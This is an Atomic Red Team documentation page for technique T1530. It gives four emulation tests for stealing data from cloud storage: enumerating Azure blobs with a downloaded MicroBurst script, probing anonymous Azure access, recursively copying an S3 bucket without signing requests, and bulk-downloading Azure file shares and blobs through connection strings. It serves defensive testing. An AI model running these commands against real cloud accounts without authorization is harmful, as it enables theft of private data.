Skip to content
Atomic Red Team
atomics
T1530

T1530 - Data from Cloud Storage Object

Description from ATT&CK (opens in a new tab)

Adversaries may access data from cloud storage.

Many IaaS providers offer solutions for online data object storage such as Amazon S3, Azure Storage, and Google Cloud Storage. Similarly, SaaS enterprise platforms such as Office 365 and Google Workspace provide cloud-based document storage to users through services such as OneDrive and Google Drive, while SaaS application providers such as Slack, Confluence, Salesforce, and Dropbox may provide cloud storage solutions as a peripheral or primary use case of their platform.

In some cases, as with IaaS-based cloud storage, there exists no overarching application (such as SQL or Elasticsearch) with which to interact with the stored objects: instead, data from these solutions is retrieved directly though the Cloud API (opens in a new tab). In SaaS applications, adversaries may be able to collect this data directly from APIs or backend cloud storage objects, rather than through their front-end application or interface (i.e., Data from Information Repositories (opens in a new tab)).

Adversaries may collect sensitive data from these cloud storage solutions. Providers typically offer security guides to help end users configure systems, though misconfigurations are a common problem.(Citation: Amazon S3 Security, 2019)(Citation: Microsoft Azure Storage Security, 2019)(Citation: Google Cloud Storage Best Practices, 2019) There have been numerous incidents where cloud storage has been improperly secured, typically by unintentionally allowing public access to unauthenticated users, overly-broad access by all users, or even access for any anonymous person outside the control of the Identity Access Management system without even needing basic user permissions.

This open access may expose various types of sensitive data, such as credit cards, personally identifiable information, or medical records.(Citation: Trend Micro S3 Exposed PII, 2017)(Citation: Wired Magecart S3 Buckets, 2019)(Citation: HIPAA Journal S3 Breach, 2017)(Citation: Rclone-mega-extortion_05_2021)

Adversaries may also obtain then abuse leaked credentials from source repositories, logs, or other means as a way to gain access to cloud storage objects.

Atomic Tests


Atomic Test #1 - Azure - Enumerate Azure Blobs with MicroBurst

Upon successful execution, this test will utilize a wordlist to enumerate the public facing containers and blobs of a specified Azure storage account. See https://www.netspi.com/blog/technical/cloud-penetration-testing/anonymously-enumerating-azure-file-resources/ (opens in a new tab) .

Supported Platforms: Iaas:azure

auto_generated_guid: 3dab4bcc-667f-4459-aea7-4162dd2d6590

Inputs:

NameDescriptionTypeDefault Value
baseAzure blob keyword to enumerate (Example, storage account name)stringsecure
output_fileFile to output results tostring$env:temp\T1530Test1.txt
wordlistFile path to keywords for search permutationsstringPathToAtomicsFolder\..\ExternalPayloads\permutations.txt

Attack Commands: Run with powershell!

import-module "PathToAtomicsFolder\..\ExternalPayloads\Invoke-EnumerateAzureBlobs.ps1"
Invoke-EnumerateAzureBlobs -base #{base} -permutations "#{wordlist}" -outputfile "#{output_file}"

Cleanup Commands:

remove-item #{output_file} -erroraction silentlycontinue

Dependencies: Run with powershell!

Description: The Invoke-EnumerateAzureBlobs module must exist in PathToAtomicsFolder..\ExternalPayloads.
Check Prereq Commands:
if (test-path "PathToAtomicsFolder\..\ExternalPayloads\Invoke-EnumerateAzureBlobs.ps1"){exit 0} else {exit 1}
Get Prereq Commands:
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
invoke-webrequest "https://raw.githubusercontent.com/NetSPI/MicroBurst/156c4e9f4253b482b2b68eda4651116b9f0f2e17/Misc/Invoke-EnumerateAzureBlobs.ps1" -outfile "PathToAtomicsFolder\..\ExternalPayloads\Invoke-EnumerateAzureBlobs.ps1"
Description: The wordlist file for search permutations must exist in PathToAtomicsFolder..\ExternalPayloads.
Check Prereq Commands:
if (test-path "#{wordlist}"){exit 0} else {exit 1}
Get Prereq Commands:
invoke-webrequest "https://raw.githubusercontent.com/NetSPI/MicroBurst/156c4e9f4253b482b2b68eda4651116b9f0f2e17/Misc/permutations.txt" -outfile "#{wordlist}"


Atomic Test #2 - Azure - Scan for Anonymous Access to Azure Storage (Powershell)

Upon successful execution, this test will test for anonymous access to Azure storage containers by invoking a web request and outputting the results to a file. The corresponding response could then be interpreted to determine whether or not the resource/container exists, as well as other information. See https://ninocrudele.com/the-three-most-effective-and-dangerous-cyberattacks-to-azure-and-countermeasures-part-2-attack-the-azure-storage-service (opens in a new tab)

Supported Platforms: Iaas:azure

auto_generated_guid: 146af1f1-b74e-4aa7-9895-505eb559b4b0

Inputs:

NameDescriptionTypeDefault Value
base_nameAzure storage account name to teststringT1530Test2
output_fileFile to output results tostring$env:temp\T1530Test2.txt
container_nameContainer name to search for (optional)string
blob_nameBlob name to search for (optional)string

Attack Commands: Run with powershell!

try{$response = invoke-webrequest "https://#{base_name}.blob.core.windows.net/#{container_name}/#{blob_name}" -method "GET"}
catch [system.net.webexception]
{if($_.Exception.Response -ne $null)
{$Response = $_.Exception.Response.GetResponseStream()
$ReadResponse = New-Object System.IO.StreamReader($Response)
$ReadResponse.BaseStream.Position = 0
$responseBody = $ReadResponse.ReadToEnd()}
else {$responseBody = "The storage account could not be anonymously accessed."}}
"Response received for #{base_name}.blob.core.windows.net/#{container_name}/#{blob_name}: $responsebody" | out-file -filepath #{output_file} -append

Cleanup Commands:

remove-item #{output_file} -erroraction silentlycontinue


Atomic Test #3 - AWS - Scan for Anonymous Access to S3

Upon successful execution, this test will test for anonymous access to AWS S3 buckets and dumps all the files to a local folder.

Supported Platforms: Iaas:aws

auto_generated_guid: 979356b9-b588-4e49-bba4-c35517c484f5

Inputs:

NameDescriptionTypeDefault Value
s3_bucket_nameName of the bucketstringredatomic-test2

Attack Commands: Run with sh!

aws --no-sign-request s3 cp --recursive s3://#{s3_bucket_name} /tmp/#{s3_bucket_name}

Cleanup Commands:

aws s3 rb s3://#{s3_bucket_name} --force 
rm -rf /tmp/#{s3_bucket_name}

Dependencies: Run with sh!

Description: Check if ~/.aws/credentials file has a default stanza is configured
Check Prereq Commands:
cat ~/.aws/credentials | grep "default"
aws s3api create-bucket --bucket #{s3_bucket_name}
aws s3api put-bucket-policy --bucket #{s3_bucket_name} --policy file://$PathToAtomicsFolder/T1530/src/policy.json
touch /tmp/T1530.txt
aws s3 cp /tmp/T1530.txt s3://#{s3_bucket_name}
Get Prereq Commands:
echo Please install the aws-cli and configure your AWS default profile using: aws configure


Atomic Test #4 - Azure - Dump Azure Storage Account Objects via Azure CLI

This test dumps the content of the storage account objects present in the file defined in file_shares_csv_file_path. Note that this file is created in the atomic test T1619 "Azure - Enumerate Storage Account Objects via Key-based authentication using Azure CLI". When created manually, it must contain the columns "ResourceGroup","StorageAccountName", "FileShareName", "ContainerName", "BlobName".

Requirements: - The test is intended to be executed in interactive mode (with -Interactive parameter) in order to complete the az login command when MFA is required. - The EntraID user must have the role "Storage Account Contributor", or a role with similar permissions.

Supported Platforms: Iaas:azure

auto_generated_guid: 67374845-b4c8-4204-adcc-9b217b65d4f1

Inputs:

NameDescriptionTypeDefault Value
output_folderFolder path to output file share content topath$env:temp\T1530_storage_account_objects
storage_account_objects_csv_file_pathPath to file that contains all storage account objects in form of a csv file. This may be the result from Test T1619 "Azure - Enumerate Storage Account Objects via Key-based authentication using Azure CLI".path$env:temp\T1619_storage_account_objects.csv

Attack Commands: Run with powershell!

$storage_account_objects = Import-Csv -Path "#{storage_account_objects_csv_file_path}"
 
# Login to Azure
az login
 
if (-not (Test-Path -Path "#{output_folder}")) {
    New-Item -ItemType Directory -Path "#{output_folder}"
}
 
foreach ($row in $storage_account_objects) {
    
    if ($row.FileShareName -ne ""){
        $allowSharedKeyAccess = az storage account show --name $row.StorageAccountName --resource-group $row.ResourceGroup --query "allowSharedKeyAccess"
 
        if ($allowSharedKeyAccess -eq "false") {    # $allowSharedKeyAccess could be true or null
            Write-Output "Shared key access is disabled for this storage account."
        } else {
            Write-Output "Fetching content from file share: $($row.FileShareName) in storage account $($row.StorageAccountName) ..."
            $connectionString = az storage account show-connection-string --name $row.StorageAccountName --resource-group $row.ResourceGroup --query connectionString --output tsv
            
            # Create folder for storage account objects
            $storageAccountOutputPath = Join-Path #{output_folder} "$($row.ResourceGroup)_$($row.StorageAccountName)"
            if (-not (Test-Path -Path $storageAccountOutputPath)) {
                New-Item -ItemType Directory -Path $storageAccountOutputPath
            }
 
            # create folder for file share content
            $fileSharePath = Join-Path -Path $storageAccountOutputPath $row.FileShareName
            if (-not (Test-Path -Path $fileSharePath)) {
                New-Item -ItemType Directory -Path $fileSharePath
            }
            az storage file download-batch --connection-string $connectionString --source $row.FileShareName --destination $fileSharePath
        }
    } elseif ($row.ContainerName -ne "" -and $row.BlobName -eq "") {
        $allowSharedKeyAccess = az storage account show --name $row.StorageAccountName --resource-group $row.ResourceGroup --query "allowSharedKeyAccess"
 
        if ($allowSharedKeyAccess -eq "false") {    # $allowSharedKeyAccess could be true or null
            Write-Output "Shared key access is disabled for this storage account."
        } else {
            Write-Output "Fetching all blobs from container $($row.ContainerName) in storage account $($row.StorageAccountName) ..."
            $connectionString = az storage account show-connection-string --name $row.StorageAccountName --resource-group $row.ResourceGroup --query connectionString --output tsv
            
            # Create folder for storage account objects
            $storageAccountOutputPath = Join-Path #{output_folder} "$($row.ResourceGroup)_$($row.StorageAccountName)"
            if (-not (Test-Path -Path $storageAccountOutputPath)) {
                New-Item -ItemType Directory -Path $storageAccountOutputPath
            }
 
            # create folder for blob content
            $containerFolderPath = Join-Path $storageAccountOutputPath $row.ContainerName
            if (-not (Test-Path -Path $containerFolderPath)) {
                New-Item -ItemType Directory -Path $containerFolderPath
            }
            az storage blob download-batch --destination $containerFolderPath --source $row.ContainerName --connection-string $connectionString
        }
    }
}

Cleanup Commands:

Remove-Item -Path "#{output_folder}" -Recurse -Force -erroraction silentlycontinue
Write-Output "Removed #{output_folder}"

Dependencies: Run with powershell!

Description: Azure CLI must be installed
Check Prereq Commands:
try {if (Get-InstalledModule -Name Az -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}
Get Prereq Commands:
Install-Module -Name Az -Force